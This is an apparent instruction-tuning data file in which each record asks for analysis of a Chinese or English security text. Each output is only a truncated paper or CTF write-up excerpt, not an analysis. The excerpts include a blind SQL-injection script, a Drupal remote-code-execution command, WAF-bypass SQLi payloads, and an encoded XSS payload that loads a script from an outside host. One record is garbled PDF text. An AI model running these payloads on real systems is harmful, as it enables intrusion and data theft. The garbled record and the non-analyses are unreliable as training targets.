{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n原始文档 By martin zhou(周雨阳 编辑s1mba ## 0x00 背景 DOM-Based XSS是一种基于文档对象模型(Document Object Model,DOM)的Web前端漏洞简单来说就是JavaScript代码缺陷造成的漏洞与普通XSS不同的是DOM XSS是在浏览器的解析中改变页面DOM树且恶意代码并不在返回页面源码中回显这使我们无法通过特征匹配来检测DOM XSS给自动化漏洞检测带来了挑战 本文将总结高发DOM XSS的业务场景给出缺陷代码实例并详述漏洞产生原因最后分类给出有效彻底的防护过滤手段 ## 0x01 DOM XSS高发场景透视及修复技巧 ### 一 在前端实现页面跳转 在很多场景下业务需要实现页面跳转常见的实现方式一般有三种第一种是在后端设置302跳转Header或通过函数接收参数实现跳转第二种是使用Meta标签实现跳转最后一种是通过JavaScript实现跳转不少Web前端工程师对最后一种跳转的方式情有独钟最常用到的方法有: location.href / location.replace() / location.assign() 也许提到页面跳转业务场景下的安全问题你首先会想到限制不严导致任意URL跳转而DOM-XSS与此似乎没啥关系但有一种神奇的东西叫伪协议比如javascript:vbscript:data:tencent:mobileqqapi:等其中 javascript:vbscript:data:在浏览器下可以执行脚本 ![domxss_4](../pictures/domxss_4.png) (图使用javascript:伪协议在页面内执行脚本) 最为要命的是使用这些伪协议执行的JavaScript代码的上下文context就是当前页面也就相当于在页面内注入了一段恶意JavaScript代码至此攻击者也就能实施攻击了 经过前几年DOM-XSS狂轰滥炸式的洗礼Web前端工程处理起相关跳转代码逻辑来也个个都是有经验的老司机了直接从各种来源取跳转目标URL然后通过上面提到的三个JavaScript实现跳转的方式已销声匿迹 你以为这样就结束了之前提到由于JavaScript是一种客户端脚本语言如果说Web后端代码有一层窗户纸护着的话那位于Web前端的JavaScript代码基本就是在裸奔所以以下若干种过滤对抗手段一下子就会眼尖的攻击者绕过并继续大摇大摆的构造攻击 常见缺陷1使用indexOf判断URL参数是否合法 示例缺陷代码 ``` javascript function emptyFn(){} function init(){ var jump = getQueryString('jump'); jump = decodeURIComponent(jump); if (jump && jump.indexOf(\"tmast://\") > -1) { jump = jump; } else { jump = \"tmast://found\"; } setTimeout(function(){ window.JSBReady(function(readyState) { if (readyState) { jsb('closeWebView',0,'emptyFn',{}); } }); },1000); location.href=jump; } init(); ``` JavaScript相关规范中指出indexOf() 方法可返回某个指定的字符串值在字符串中首次出现的位置该方法将从头到尾地检索字符串 stringObject看它是否含有子串 searchvalue 也就是如果传入的URL中带有indexOf的关键词那indexOf方法将直接返回true拿上面的缺陷代码为例只要攻击传入的URL中带有`tmast://`indexOf将直接返回true并进入跳转逻辑所以攻击者只要构造 `javascript:alert(1);//tmast://` 即可完成攻击又因为`tmast://`位于JavaScript代码的注释部分所以JavaScript代码运行时会直接忽略但indexOf却认为URL中存在`tmast://`直接放行 常见缺陷2正则表达式缺陷 示例缺陷代码 [1] ``` javascript function VaildURL(sUrl) { return (/(https?:\\/\\/)?[\\w\\-.]+\\.(qq|paipai|soso|taotao)\\.com($|\\/|\\\\)/i).test(sUrl)|| (/[\\w][\\w\\/\\.\\-_%]+$/i).test(sUrl)||(/[\\/\\\\][\\/\\\\]/i).test(sUrl) ? true ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfuser === 使用文件或文件结构识别进程 ## 补充说明 **fuser命令** 用于报告进程使用的文件和网络套接字fuser命令列出了本地进程的进程号那些本地进程使用file参数指定的本地或远程文件对于阻塞特别设备此命令列出了使用该设备上任何文件的进程 每个进程号后面都跟随一个字母该字母指示进程如何使用文件 * `c` 指示进程的工作目录 * `e` 指示该文件为进程的可执行文件(即进程由该文件拉起) * `f` 指示该文件被进程打开默认情况下f字符不显示 * `F` 指示该文件被进程打开进行写入默认情况下F字符不显示 * `r` 指示该目录为进程的根目录 * `m` 指示进程使用该文件进行内存映射抑或该文件为共享库文件被进程映射进内存 ### 语法 ```shell fuser(选项)(参数) ``` ### 选项 ```shell -a显示命令行中指定的所有文件 -k杀死访问指定文件的所有进程 -i杀死进程前需要用户进行确认 -l列出所有已知信号名 -m指定一个被加载的文件系统或一个被加载的块设备 -n选择不同的名称空间 -u在每个进程后显示所属的用户名 ``` ### 参数 文件可以是文件名或者TCPUDP端口号 ### 实例 要列出使用`/etc/passwd`文件的本地进程的进程号请输入 ```shell fuser /etc/passwd ``` 要列出使用`/etc/filesystems`文件的进程的进程号和用户登录名请输入 ```shell fuser -u /etc/filesystems ``` 要终止使用给定文件系统的所有进程请输入 ```shell fuser -k -x -u -c /dev/hd1 或者 fuser -kxuc /home ``` 任一命令都列出了进程号和用户名然后终止每个正在使用`/dev/hd1 (/home)`文件系统的进程仅有root用户能终止属于另一用户的进程如果您正在试图卸下`/dev/hd1`文件系统而一个正在访问`/dev/hd1`文件系统的进程不允许这样您可能希望使用此命令 要列出正在使用已从给定文件系统删除的文件的全部进程请输入 ```shell fuser -d /usr文件 ``` `/dev/kmem` 用于系统映像 `/dev/mem` 也用于系统映像", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDe1CTF 2019 WP Author:Nu1L Team Team Page:https://nu1l-ctf.com De1CTF 2019 WP Web Giftbox cloudmusic_rev 9calc ssrf ShellShellShell Re Evil_boost Signal vm Re_Sign Cplusplus Pwn A+B Judge Weapon Mimic_note Crypto xorz babyrsa Misc Upgrade Mine Sweeping Web Giftbox import pyotp import requests import string url = \"http://222.85.25.41:8090/shell.php\" session = requests.session() def req(cmd): command = {\"a\": cmd, \"totp\": pyotp.TOTP('GAXG24JTMZXGKZBU', interval=5, digits=8).now()} res = session.get(url, params = command) hint{G1ve_u_hi33en_C0mm3nd-sh0w_hiiintttt_23333} PHP, PHP, return res def blind_len(query): for i in range(1, 100): cmd = \"login admin'/**/and/**/length((\"+query+\"))>{}# admin\".format(i) result = req(cmd) if b'user' in result.content: return i-1 def blind_get(query): length = blind_len(query) print(length) result = '' for i in range(1, length+2): for c in string.printable: cmd = \"login admin'/**/and/**/ord(mid((\"+query+\"),{},1))={}# admin\".format(i, ord(c)) # print(cmd) resp = req(cmd) # print(resp) if b'password' in resp.content: result += c break print(result) if __name__ == \"__main__\": # blind_get('select/**/database()') # blind_len('select/**/version()') # blind_get('select/**/user()') # blind_get('select/**/group_concat(schema_name)/**/from/**/information_schema.s chemata') # blind_get(\"select/**/group_concat(table_name)/**/from/**/information_schema.ta bles/**/where/**/table_schema='giftbox'\") # blind_get(\"select/**/group_concat(column_name)/**/from/**/information_schema.c olumns/**/where/**/table_name='users'\") # blind_get(\"select/**/password/**/from/**/users/**/where/**/username='admin'\") while True: print(req(input()).json()['message']) targeting code position` `code` `position launch PHP destruct position 0-9a-zA-Z+-_(){}$ , 12, code 2 phpinfo chdir, ini_set openbase_dir flag eval payload cloudmusic_rev https://github.com/impakho/ciscn2019_final_web1 githubexpok0x3000x7022Z2teQgmmLQJLjD targeting c phpinfo targeting d ${($c)()} launch destruct ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNew Phishing Attacks Exploiting OAuth Authorization Flows August 7, 2021 Jenko Hwong jhwong@netskope.com @jenkohwong $ az ad signed-in-user show [ { \"jobTitle\": \"Researcher\", \"department\": \"Threat Research Labs\", \"company\": \"Netskope, Inc.\", \"email\": \"jhwong@netskope.com\" \"twitter\": \"@jenkohwong\", \"background\": \"vulnerability scanning, AV/AS, pen-testing/exploits, L3/4 appliances, threat intel, windows security\", } ] Phishing Evolution: smtp, fake domain, ssl cert, user/pwd in the beginning... Phishing Evolution: apps, fake domain, ssl cert, user/pwd fake website phish browse, auth steal username password victim 1 2 3 smtp, sms, IM, chat... http(s) attacker +mobile Phishing Evolution: apps, fake domain, ssl cert, user/pwd fake website hosted in cloud phish browse, auth victim 1 2 smtp, sms, IM, chat... http(s) attacker steal username password 3 +cloud fake website hosted in cloud phish browse, auth victim 1 2 smtp http(s) attacker steal username password 3 +cloud Phishing Evolution: apps, fake domain, ssl cert, user/pwd Phishing Evolution: fake domain, apps, ssl cert, user/pwd fake website phish browse, auth steal username password victim 1 2 3 smtp, sms, IM, chat... http(s) attacker controls MFA IP allow policies link analysis (domain/URLs/certs) sender reputation link analysis (domain/URLs/certs) content inspection (creds) Phishing Evolution: OAuth 2.0 auth code grant[1] +cloud app authorization Application (client, device) User Azure AD Google Identity Identity Platform 1 2 3 Authenticate and Authorize Authenticate (MFA) Authorize permissions (scopes) OAuth Tokens access token refresh token Request Authorization Request permissions (scopes) Redirect user to Identity Platform (authorization service) [1] https://datatracker.ietf.org/doc/html/rfc6749#page-24 Phishing Evolution: OAuth 2.0 auth code grant +cloud app authorization: Payments Phishing Evolution: OAuth 2.0 auth code grant +cloud app authorization: Payments Phishing Evolution: OAuth 2.0 auth code grant +cl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Writeup CSAW CTF 2015 Uczestniczyliśmy (msm, Rev, Shalom, other019 i nazywam) w CSAW CTF, i znowu spróbujemy opisać zadania z którymi walczyliśmy (a przynajmniej te, które pokonaliśmy). insert lanie_wody into writeup; Ogólne wrażnia: Konkurs miał kilka ciekawych zadań, ale jednak troche odbiegał od tego czego można oczekiwać po ctf'ie z prawdziwego zdarzenia. Niektóre zadania opierały się na zgadywaniu tego co autorzy mieli na myśli, w szczególności notesy i airport. insert lanie_wody into writeup; A teraz opisy zadań po kolei. # Spis treści: * web 100 K_{Stairs} * [Lawn Care Simulator (web 200)](web_200_lawn_care_simulator) * [precision (exploit 100)](pwn_100_precision) * [FTP 2 (exploit 300)](pwn_300_ftp2) * memeshop (exploit 400) * [rhinoxorus (exploit 500)](pwn_500_rhinoxorus) * [ones_and_zer0es (crypto 50)](crypto_50_ones_and_zer0es) * [whiter0se (crypto 50)](crypto_50_wh1ter0se) * [zer0-day (crypto 50)](crypto_50_zer0_day) * [notesy (crypto 100)](crypto_100_notesy) * [Hacking Time (reversing 200)](re_200_hacking_time) * [FTP (reversing 300)](re_300_ftp) * [wyvern (reversing 500)](re_500_wyvern) * [Keep Calm and CTF (forensics 100)](forensics_100_keep_calm_and_ctf) * [Transfer (forensics 100)](forensics_100_transfer) * [Flash (forensics 100)](forensics_100_flash) * [pcapin (forensics 150)](forensics_150_pcapin) * [airport (forensics 200)](forensics_200_airport) * [sharpturn (forensics 400)](forensics_400_sharpturn) * [Julian Cohen (recon 100)](recon_100_julian_cohen) * [Alexander Taylor (recon 100)](recon_100_alexander_taylor) * [Trivia 1 (trivia 10)](trivia_trivia_1) * [Trivia 2 (trivia 10)](trivia_trivia_2) * [Trivia 3 (trivia 10)](trivia_trivia_3) * [Trivia 4 (trivia 10)](trivia_trivia_4) * [Trivia 5 (trivia 10)](trivia_trivia_5) * [Math aside, we are all black hats Now (trivia 10)](trivia_10_black_hat) Zadania niedokończone: * [Weebdate (web 500)](web_500_weebdate) # Zakończenie insert into writeup(content) values lanie_wody; Zachęcamy do komentarzy/pytań", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nS-fastjson fastjson的使用 实体类 package fastjson.example.use; import java.util.Map; public class User { private String name; private int age; private Map hashMap; @Override public String toString() { return \"User{\" + \"name='\" + name + '\\'' + \", age=\" + age + \", hashMap=\" + hashMap + '}'; } public User(String name, int age, Map hashMap) { this.name = name; this.age = age; this.hashMap = hashMap; } public User() { } public String getName() { return name; } public void setName(String name) { this.name = name; } public int getAge() { return age; } public void setAge(int age) { this.age = age; } public Map getHashMap() { return hashMap; } public void setHashMap(Map hashMap) { 序列化 在调用 toJSONString 方法的时候参数里面多了一个 SerializerFeature.WriteClassName 方 法传入 SerializerFeature.WriteClassName 可以使得 Fastjson 支持自省开启自省后序列 化成 JSON 的数据就会多一个 @type 这个是代表对象类型的 JSON 文本 FastJson 的漏洞就是 他的这一个功能去产生的在对该 JSON 数据进行反序列化的时候会去调用指定类中对于的 get/set/is 方法 后面会详细分析 反序列化 this.hashMap = hashMap; } } package fastjson.example.use; import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.serializer.SerializerFeature; import java.util.HashMap; public class serialize { public static void main(String[] args) { String name=\"zhangsan\"; int age=20; HashMap hashMap = new HashMap(); User user = new User(name, age, hashMap); String s = JSON.toJSONString(user); System.out.println(s); System.out.println(\"==================================\"); String s1 = JSON.toJSONString(user, SerializerFeature.WriteClassName); System.out.println(s1); } } /* {\"age\":20,\"hashMap\":{},\"name\":\"zhangsan\"} ================================== {\"@type\":\"fastjson.example.use.User\",\"age\":20,\"hashMap\": {\"@type\":\"java.util.HashMap\"},\"name\":\"zhangsan\"} */ package fastjson.example.use; import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONObject; import com.alibaba.fastjson.serializer.SerializerFeature; import java.util.HashMap; public class unserialize { public static void main(String[] args) { String name=\"lisi\"; int age=21; HashMap hashMap = n", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWPA TOO ! Md Sohail Ahmad AirTight Networks www.airtightnetworks.com About the Speaker 2007, Toorcon9 2009, Defcon 17 2008, Defcon 16 Caffe Latte Attack Autoimmunity Disorder in Wireless LANs WiFish Finder: Who will bite the bait? 2010, Defcon 18 WPA TOO ! Defcon 18 WPA2 is vulnerable under certain conditions. This limitation, though known to the designers of WPA2, is not well understood or appreciated by WiFi users. In this talk, I am going to show that exploits are possible using off the shelf tools with minor modifications. About the Talk Background WEP, the one and only security configuration present in the original 802.11 standard, was cracked in 2001. Since then several attacks on WEP have been published and demonstrated Nowadays most WLANs are secured with a much better and robust security protocol called WPA2. Interestingly, WPA2 is also being used to secure Guest WiFi, Municipal WiFi (e.g. GoogleWiFi Secure) and Public WiFi (e.g. T- Mobile or AT&T WiFi Hotspot) networks. Defcon 18 Is WPA2 safe to be used in WiFi networks? Defcon 18 2003 PSK Vulnerability 2004 PSK cracking tool, Eavesdropping 2008 TKIP Vulnerability PEAP Mis-config Vulnerability Known attacks on WPA/WPA2 Attack on Pre-Shared Key (PSK) Authentication Attack on 802.1x Authentication Attack on Encryption Implications: Eavesdropping Unauthorized Access to the network Implications: Client compromise Implications: Injection of small size frames to create disruption Defcon 18 1. Do not use PSK authentication in other than private/home network (Solves PSK Vulnerability) 2. Do not ignore certificate validation check in clients configuration (Solves Client Vulnerability) 3. Use AES encryption (Solves TKIP Vulnerability) Solution Is WPA2 safe to be used in WiFi networks? Defcon 18 Encryption in WPA2 Defcon 18 Encryption Keys Two types of key for data encryption 1. 1. Pairwise Key (PTK) 2. 2. Group Key (GTK) While PTK is used to protect unicast data frames , GTK is used to protect group addressed data f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAll Your RFz Are Belong to Me: Hacking the Wireless World with Software Defined Radio Balint Seeber balint@spench.net @spenchdotnet Notes and links in PDF comments on each slide Applications Engineer balint@ettus.com Overview  RF 101  The journey into Software Defined Radio  Hospital pager systems  Tracking planes  Decoding satellitedownlink traffic  Direction Finding The Electromagnetic Spectrum  Electromagnetism: one of four universal forces  Radio wave exists due to energy being propagated at a particular frequency  Can create and receive radio waves using electronics Transmitting Data  Radio (carrier) wave must be modulated to convey information Time Amplitude Transmitting Data  Radio (carrier) wave must be modulated to convey information  OOK (OnOff Keying)  Presence/absence of a signal  COFDM (Coded Orthogonal Frequency Division Multiplexing)  WiFi, DVB, DAB, WiMAX, UWB, 4G, ADSL, PLC Transmitting Data Information Modulator Carrier RF Hardware AM & FM: In the Time Domain Analog or digital information Constant frequency Constant amplitude In the Frequency Domain Time Amplitude for each frequency Frequency Modulation  Modulation technique defines how the signal will look on the spectrum AM FM C4FM Time Frequency Frequency Carrier Time Frequency Hardware  Crystal set receiver  Powerful AM transmissions Hardware  Crystal set receiver  Powerful AM transmissions Hardware  Crystal set receiver  Powerful AM transmissions  More advanced hardware to handle increasingly complex modulation schemes  FM, stereo FM, microwave, digital Modulation in Hardware  MOdulation and DEModulation traditionally performed in hardware  Black box implementation  Not reconfigurable  Modern digital hardware allows more flexibility Radyne Comstream DMD15 Satellite Modem The journey begins Genesis of RFMap GSM + Gammu + Wireshark Field Test Mode <1983> MDI:d2m/RSSI_RESULTS t=0afe nr=73: D 83: 00 00 b1 b1 00 65 ab a3 b1 a0 a0 a6 9d a1 80 a4 80 80 80 80 80 80 80 aa Geolocation with GSM RFNetMapp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nF.O.E. Feed Over Email A Proxy-less RSS Reader A Proxy-less RSS Reader http://code.google.com/p/foe-project By Sho Ho Broadcasting Board of Governors F.O.E. Who am I? Name: Sho Ho Job Title: Software Engineer Employer: Broadcasting Board of Governors Mother ship of Voice of America, Radio Free Europe/Radio Liberty, Radio Free Asia, Radio & TV Marti, etc. Liberty, Radio Free Asia, Radio & TV Marti, etc. Duties: Internet anti-censorship R&D; programming. Contact: ssho@bbg.gov F.O.E. The Big Challenge Facts: Countries censor the Internet and people cannot access indecent websites. Problem: Indecent may include Voice of Problem: Indecent may include Voice of America, CNN, BBC, etc. Challenge: How to bypass censorships? F.O.E. Offending Countries  Big offenders of Internet censorship:  Belarus, Burma, China, Cuba, Egypt, Ethiopia, Iran, North Korea, Saudi Arabia, Syria, Tunisia, Turkmenistan, Uzbekistan, Vietnam, Zimbabwe Turkmenistan, Uzbekistan, Vietnam, Zimbabwe  and minor offenders:  Australia, Bahrain, Belgium, Brazil, Canada, Chile, Czech Republic, Denmark, Fiji, Finland, France, Ghana, India, Ireland, Israel, Italy, Jordan, Maldives, Mexico, Morocco, Myanmar, Netherlands, Norway, Pakistan, Russia, Saudi Arabia, Singapore, South Korea, Sweden, Thailand, Turkey, United Arab Emirates, United Kingdom, Yemen, and USA (WTF?!!) F.O.E. Censorship Technologies  IP Address Filtering  Domain Name Blocking  Packet (Content/URL/Keyword) Filtering  DNS Hijacking  DNS Hijacking  Desktop monitoring software. E.g. Green Dam (made in China).  Any combination and/or variation of the above. New F.O.E. Anti-Censorship Technologies  Web-Based Proxy Servers  Client-Side Proxy Software  Pure Peer-to-Peer (P2P)  Email  Email  Monitoring software removal tools. F.O.E. Anti-Censorship Technologies  Web-Based Proxy Servers  Advantages:  Easy to deploy  No download required  Effective against most common forms of censorship  Effective against most common forms of censorship  Disadvantages:  L", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n! \" # $ % & & & ' ! \" # $%& ' %& ! \" ( ( '$)) *+%& $,%- ! Æ \" . ( \" . , / ' 0 1 0 , 2 \" . \" 0 \" ' . $%& ' %& ! 3 . ' 4 ' \" 5 , . ' 6 7 8 4 8 ( ( . ' . 5 ' 5 8 0 0 . \" # . 9 8 0 . : : ; 0 . . . 0 \" Æ 8 \" . < : . 2 . 0 $ 0 . . . . : . & 4 9 - . , ' 0 : - . . = 4 > . > ? @ 5 A> ! 8 2 ' # ' 05 ' B \" ' Æ \" 8 25 8 2 , 0 . 4 .8$)A ! < . Æ Æ ( & 4 4 ) * + * , \" \" 8 # ! ! ! 4 . '$)) *+%& ! \" 8 \" . 1 $%& ! \" . 1 8 ? ' %& ! \" 5 8 . . 0 . \" 4 . &))A 8 $: 8 ' 4 . '$)) ! C D $ 2 %&! . $,%- ! , 67 C *+%& *+%& ! $3* \" \" , . \" . ' . \" ( . . \" . Æ ' . ( . . 0 ' E : . . . 8 . F$))! 4 : \" #. $ 8F)A 8$%% ! . : 0 0)A ! G G)A ! . . , 4 \" F$%- ! 1 61 < 7 8$)A ! \" . G . G)A! \" . . \" \" \" 8 & % - \" B & G \" - 4 \" A \" % -?@ ' % - ' % -?@ - 4 ' ' H > \" > + -./ .//0 /012 1232 3240 405-- 5--5-3 5-3556 7 - 5 0 2 . 6 / 1 + 556502 50.520 5205.0 5.056. 56.5/4 5/4533 53305. 05.066 7 3 4 5- 55 50 52 5. 56 \" 8 # ' . \" - ->-&& \" -?@ \" 4 0 : ' 0 , ( 8 / . . < . 06- 0-- 56- 5-- 6- 2-- 06- 0-- 56- 5-- 6- - 8 1 \" \" H > \" 4 - \" . . \" B * 8 H > 1 \" B \" \" 60 \" \" . 5 . \" . \" . \" 1 1 B . \" 4 . 5 5 . 5 \" . . . B I 5 E G . + 3 Æ . 8 \" - \" B G \" E \" C \" 0 . \" . \" : \" Æ . 8 . . . * . $%& ! 1 $3* *+%& ! 1 . , ' . 67 \" \" . # A > \" 8 &@ ' . A > - 4 . &@ \" \" . ' : \" \" . \" . \" . : \" . \" ' 6. 7 2 / , ' 1 / Æ . D B Æ ( D ' \" Æ * F 6 7 , 8 ( 67 ( $ . 8 6 7 8 6# 8 $ ' .7 6D 8 G 87 1 . 67 ( . ( ' 6 . 7 67 / . 1 . . , / B \" . 8 2 / J , \" 8 2 \" : 8 4 \" ( \" K , L .L G . . , \" . 8 . #. $ 8F)A 8$%% ! \" #. 4 1 4 #. \" . ) &)> \" . \" . . K \" ' 4 A%M ' Æ ?= . 8 ! : . ( . 8 . N 8 : ( 6 . 7 8 . . 1 . ! \" # 0 \" 8 . 1 . . B ' . . 9*,43: + * ; * , ' 5/<.1.=.35 5443 9*,--: ; *, , 51>6?<63=/. 0--- 9@43: @ @ * 8 * !! \" # 2-/=253 ) 5443 + 0--5 @ , * + 0---A-03 <AA A 9@43: ) @ ' 8 * !! \" # 266=2/3 ) 5443 9; 8-5: B ; C + 8 + $ $ % 01=2- 0--5 9; 8-5: B ; C + 8 ) C $ % & 0--5 9B: B <AA AA 9B43: B 8 * !! \" # 2..=26. ) 5443 9D,44: D ; , * ' % $ ()!* 054=024 5444 9D,-0: ) DE ; * , 8 +)*! % $ 0--0 9, *D43: ; * , + B * D * 8 * !! \" # 054=024 )7 5443 9,F-0", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Drupal 远程代码执行漏洞CVE-2018-7602 * 影响软件drupal * 方式对URL中的#进行编码两次绕过sanitize()函数过滤 * 效果任意命令执行 ## 漏洞环境 执行如下命令启动drupal 7.57的环境 ```bash docker compose up -d ``` 环境启动后访问 `http://your-ip:8081/` 将会看到drupal的安装页面一路默认配置下一步安装因为没有mysql环境所以安装的时候可以选择sqlite数据库 ## 漏洞复现 参考[pimps/CVE-2018-7600](https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7602.py)的PoC 如下图所示执行以下命令即可复现该漏洞示例命令为 `id`如图红框中显示可以执行该命令 ```bash # \"id\"为要执行的命令 第一个drupal为用户名 第二个drupal为密码 python3 drupa7-CVE-2018-7602.py -c \"id\" drupal drupal http://127.0.0.1:8081/ ``` ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNu1L-Writeup Web Time, grasp is gold, catch up is running water. 查看源码可以得到管理员邮箱重置密码时候大小写过滤不严导致可以拿到 重置密码的连接然后发现 token 参数是 md5(time())并且提示 ip 不符合猜 测 xff但服务器时间与 token 的时间相差 8h于是遍历然后重置密码 进入后台存在 XXE 漏洞blindxxe然后最后拿到 flag 简陋的博客 变量覆盖只过滤 get没过滤 post经过测试发现是参数是拼接到反引号 于是就很容易了 山水集团 打开商品列表看到页面里那个分享里有个能转换 ID 到 base64(某某加密)的接 口于是就本地起个代理 waf 拦截的比较多, 几个字符串处理函数union逗号空格/*=等 最后试了一下 postion(str1 IN str2)函数 空格就用括号绕过=用!(<>)绕过 /?id=(1)or(!(position((%27user_nameb%27)IN(select(group_concat(COLUMN_N AME))from(information_schema.COLUMNS)))%3C%3E1)) burp 按位跑一下 拿到表 users列名 user_name,user_pass 然后是注入出数据 GET /?id=(1)or(!(position((%27ab@15!74587~caibudaob%27)IN(select(user_pass)from (users)))<>1)) HTTP/1.1 以上是 20 位密码 用户名区分大小写可以爆破一下暂时没想到怎么不爆破验证因为他 waf 拦截的很严 先生成字典 然后跑一下就 ok 然后是登陆 登陆时发现 查看 html 源码 可以用 https://unicode-table.com/cn/#latin-1-supplement Unicode 相似字符集绕过 用户名 Q1t0ngW3ï 密码 ab@15!74587~caibudao 然后 bash 弹 shell~ 然后在 home 目录下找到 flag 中国菜刀 抓包发现一个后门地址 file_get_contents('http://118.89.225.190/shellbox.php?shell='.$_SERVER[HTTP_HO ST].$_SERVER[REQUEST_URI].'_Pwd='.key($_POST));;echo(\"|<-\");die(); 经过测试存在 xss题目提示说 flag 在源码里而且过滤有点严于是用 String.fromCharCode 绕过 http://118.89.225.190/shellbox.php?shell=<iframe src=\"javascript:eval(String.fromCharCode(118,97,114,32,104,101,97,100,61,32,100,1 11,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121, 84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,59,32,32,32,10,118,97 ,114,32,115,99,114,105,112,116,61,32,100,111,99,117,109,101,110,116,46,99,114,10 1,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,10 ,115,99,114,105,112,116,46,115,114,99,61,32,39,104,116,116,112,58,47,47,120,115, 115,46,110,117,112,116,122,106,46,99,110,47,99,104,111,112,112,101,114,46,106,1 15,39,59,32,32,32,10,104,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100 ,40,115,99,114,105,112,116,41,59))\"></iframe>/a.php_Pwd=x js 就是原生 js 读源码的 /?content=<head> <meta http-equiv=\"Content-Type\" content=\"text/html;charset=UTF-8\"> <scrip", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport gmpy2 import hashlib from Crypto.Util.number import size, getRandomRange, GCD, getStrongPrime, inverse, getRandomInteger from crypto_commons.netcat.netcat_commons import nc, send class RemoteOracle: def __init__(self): url = \"ppc2.chal.ctf.westerns.tokyo\" port = 38264 self.s = nc(url, port) def get_lsb(self, payload): send(self.s, hex(long(payload))[2:-1]) data = self.s.recv(9999) if data[0] != '1' and data[0] != '0': print(\"WTF\", data) return data[0] def LCM(x, y): return x * y // GCD(x, y) def L(x, n): return (x - 1) // n def encrypt(m, g, n, n2): r = getRandomRange(1, n2) c = pow(g, m, n2) * pow(r, n, n2) % n2 return c def decrypt(c, sk1, sk2, n, n2): return L(pow(c, sk1, n2), n) * sk2 % n def recover_high_bits(low, oracle, n, n2, g, ct): print('cracking high bits') mbits = size(n) b = mbits // 2 result_bits = [] subtractor = n - low sub = encrypt(subtractor, g, n, n2) ct_sub = (ct * sub) % n2 for i in range(b): divisor = inverse(2 ** i, n) payload = pow(ct_sub, divisor, n2) lsb = oracle.get_lsb(payload) result_bits.append(str(lsb)) return \"\".join(result_bits[::-1]) def recover_low_bits(oracle, n, n2, g, ct): print('cracking low bits') mbits = size(n) bits_to_recover = mbits // 2 result_bits = [] initial_state = oracle.get_lsb(ct) for i in range(bits_to_recover): filling = ['0' if known_bit == '1' else '1' for known_bit in result_bits] add = int(\"\".join(filling + ['1']), 2) << (bits_to_recover - i - 1) payload = (ct * encrypt(add, g, n, n2)) % n2 lsb = oracle.get_lsb(payload) if lsb != initial_state: result_bits.append('1') else: result_bits.append('0') result = \"\".join(result_bits) return result def main(): pass print('cracking...') n = 0xadd142708d464b5c50b936f2dc3a0419842a06741761e160d31d6c0330f2c515b91479f37502a0e9ddf30f7a18c71ef1eba993bdc368f7e90b58fb9fdbfc0d9ee0776dc629c8893a118e0ad8fc05633f0b9b4ab20f7c6363c4625dbaedf5a8d8799abc8353cb54bbfeab829792eb57837030900d73a06c4e87172599338fd5b1 n2 = 0x76047ed9abf5e8f5fc2a2f67162eb2bc0359c3ffa3585ba846de7181d8", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n原文 by wooyun wiki ## 一文件解析漏洞 使用了低版本的存在漏洞的web服务器解析漏洞有以下几种 ### IIS 5.x/6.0解析漏洞 目录解析:在网站下建立文件夹的名称中带有.asp.asa等可执行脚本文件后缀为后缀的文件夹其目录内的任何扩展名的文件都被IIS当作可执行文件来解析并执行 `http://www.xxx.com/xx.asp/xx.jpg` 文件解析:在IIS6.0下分号后面的不被解析也就是说6.0下分号后面的不被解析也就是说`xx.asp;.jpg`将被当做`xx.asp`解析并执行`http://www.xxx.com/xx.asp;.jpg` 在文件改名时也可以尝试 `xx.asp;jpg` IIS6.0 默认的可执行文件有aspasacercdx四种 注意这两个漏洞是需要在服务器的本地硬盘上确实存在这样的文件或者文件夹若只是通过web应用映射出来的Url则是无法触发的 ### IIS 7.0/IIS 7.5/ Nginx <0.8.3畸形解析漏洞 在默认Fast-CGI开启状况下访问以下网址服务器将把xx.jpg文件当做php解析并执行可以根据请求 /xx.jpg 和 /xx.jpg/.php 时返回的 Content-type 是否不同来判断是否存在漏洞 `http://www.xxx.com/xx.jpg/notexist.php` 修复 php 配置文件中 cgi.fix_pathinfo=0将不再递归查询路径确认文件的合法性这个往前递归的功能原本是想解决 /info.php/test 这种url能够正确解析到 info.php 上 ### Nginx <8.03 空字节代码执行漏洞 影响范围Nginx0.5.,0.6.,0.7  0.7.65, 0.8  0.8.37 访问以下网址服务器将把xx.jpg文件当做php解析并执行 `http://www.xxx.com/xx.jpg%00.php` ### Apache解析漏洞 Apache对文件解析是从右到左开始判断解析,如果文件的后缀为不可识别(apache httpd server 的 mime.types 文件里面没有定义), 就再往左判断解析 